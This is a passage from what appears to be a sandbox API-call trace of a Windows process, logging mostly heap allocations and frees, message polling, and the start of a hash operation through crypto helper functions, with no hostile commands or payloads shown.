RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0225.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0225.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0225.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0225.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0225.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e30 [0225.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f440 [0225.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0225.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0225.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0225.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5d0 [0225.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0225.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0225.381] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0225.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0225.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0225.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0225.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0225.382] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0225.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0225.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0225.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5d0 | out: hHeap=0x970000) returned 1 [0225.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0225.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f440 | out: hHeap=0x970000) returned 1 [0225.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0225.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0225.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0225.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0225.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0225.382] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0225.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0225.382] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0225.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0225.382] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0225.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f042a0 [0225.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0225.382] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0225.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f042a0 | out: hHeap=0x970000) returned 1 [0225.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0225.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50cf8 [0225.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0225.382] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0225.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0225.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0225.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0225.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0225.382] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0225.383] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0225.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0225.383] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0225.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0225.383] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0225.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0225.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0225.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0225.383] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0225.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0225.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04460 [0225.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0225.383] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0225.383] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0225.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0225.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0225.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0225.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0225.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0225.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f760 [0225.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0225.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0225.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0225.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0225.384] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0225.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0225.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0225.384] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0225.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0225.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0225.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0225.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0225.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0225.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5d0 [0225.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0225.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0225.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0225.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0225.384] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0225.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0225.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0225.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0225.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0225.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0225.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f530 [0225.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0225.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0225.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0225.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0225.385] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0225.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0225.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0225.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0225.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0225.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0225.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f418 [0225.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0225.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0225.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0225.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0225.385] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0225.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4b8 [0225.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0225.385] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0225.385] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0225.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0225.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04620 [0225.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0225.385] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0225.385] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0225.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0225.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0225.385] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0225.385] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0225.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f043b8 [0225.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0225.386] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0225.386] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0225.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0225.386] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0225.386] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0225.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0225.386] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0225.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0225.386] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0225.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0225.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0225.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0225.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0225.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04230 [0225.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0225.386] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0225.386] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0225.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0225.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0225.386] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0225.386] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0225.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0225.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0225.387] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0225.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0225.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0225.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0225.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0225.387] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0225.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0225.387] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e512f8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0225.387] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0225.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0225.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0225.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0225.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0225.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0225.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0225.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0225.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0225.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0225.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0225.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0225.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0225.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0225.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0225.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0225.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0225.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0225.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0225.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0225.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0225.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0225.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0225.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0225.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0225.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0225.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0225.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0225.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0225.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0225.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0225.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0225.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0225.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0225.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0225.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0225.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0225.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0225.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0225.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0225.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0225.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0225.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0225.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0225.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0225.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0225.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0225.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0225.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0225.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0225.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0225.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f670 | out: hHeap=0x970000) returned 1 [0225.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0225.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0225.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0225.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0225.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0225.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0225.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0225.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0225.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0225.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0225.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0225.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0225.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0225.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0225.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0225.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0225.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0225.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0225.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0225.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0225.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0225.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0225.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0225.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 